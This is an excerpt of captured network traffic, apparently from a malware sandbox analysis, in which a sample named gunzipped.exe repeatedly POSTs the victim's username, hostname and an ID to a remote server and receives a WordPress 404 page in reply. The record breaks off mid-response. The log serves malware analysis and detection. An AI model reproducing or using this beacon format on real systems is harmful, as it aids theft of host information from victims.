Apr 17, 2024 03:17:51.438585043 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49752	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:51.797146082 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:52.005431890 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:53.016751051 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:51 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:53.016868114 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:53.016906023 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:53.016946077 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:53.016988993 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:53.017029047 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:53.017071962 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:53.017112017 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:53.017152071 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:53.017190933 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49753	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:53.372678995 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:53.579726934 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:54.562074900 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:53 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:54.562139988 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:54.562231064 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:54.562268972 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:54.562309980 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:54.562346935 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:54.562386036 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:54.562423944 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:54.562464952 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:54.562509060 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49754	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:54.967221022 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:55.171137094 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:56.088845015 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:55 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 